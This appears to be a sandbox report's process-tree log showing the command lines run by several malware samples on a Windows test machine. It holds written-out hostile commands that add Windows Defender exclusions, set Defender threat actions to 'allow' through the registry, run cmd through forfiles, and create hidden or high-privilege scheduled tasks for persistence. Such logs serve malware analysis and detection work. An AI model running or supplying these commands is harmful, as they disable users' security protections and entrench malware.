"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Users\Admin\AppData\Local\Temp\7zSC3AF.tmp\Install.exe

.\Install.exe

C:\Users\Admin\Desktop\a\alex.exe

"C:\Users\Admin\Desktop\a\alex.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Albany Albany.cmd & Albany.cmd & exit

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Desktop\a\well.exe

"C:\Users\Admin\Desktop\a\well.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 2316

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte.exe" /f & erase "C:\Users\Admin\Desktop\a\mixinte.exe" & exit

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 16:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe\" PP /XafdidFSQl 385118 /S" /V1 /F

C:\Users\Admin\Desktop\a\swizzzz.exe

"C:\Users\Admin\Desktop\a\swizzzz.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,3796333605691665801,14238465934583101331,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,3796333605691665801,14238465934583101331,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3668 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe"

C:\Users\Admin\Desktop\a\sarra.exe

"C:\Users\Admin\Desktop\a\sarra.exe"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "mixinte.exe" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 9156 -ip 9156

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 920

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 9156 -s 1704

C:\Users\Admin\Desktop\a\228.exe

"C:\Users\Admin\Desktop\a\228.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"

C:\Users\Admin\Desktop\a\fileosn.exe

"C:\Users\Admin\Desktop\a\fileosn.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k move Descriptions Descriptions.cmd & Descriptions.cmd & exit

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn btZaCbGShXZoJDfvCg

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Users\Admin\Desktop\a\amers.exe

"C:\Users\Admin\Desktop\a\amers.exe"

C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe

"C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe"

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn btZaCbGShXZoJDfvCg

C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe PP /XafdidFSQl 385118 /S

C:\Users\Admin\Desktop\a\gold.exe

"C:\Users\Admin\Desktop\a\gold.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\Desktop\a\5.exe

"C:\Users\Admin\Desktop\a\5.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 8276 -ip 8276

C:\Users\Admin\Desktop\a\Newoff.exe

"C:\Users\Admin\Desktop\a\Newoff.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8276 -s 260

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Users\Admin\Documents\SimpleAdobe\uHNbZJI4JxwnevGgsCYWaO_A.exe

C:\Users\Admin\Documents\SimpleAdobe\uHNbZJI4JxwnevGgsCYWaO_A.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\Desktop\a\Newoff.exe" /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DzmQEVPXhX" /XML "C:\Users\Admin\AppData\Local\Temp\tmpD01E.tmp"

C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe

"C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe'

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'IerLRtXpEcMnUjz.exe'

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x120,0x130,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

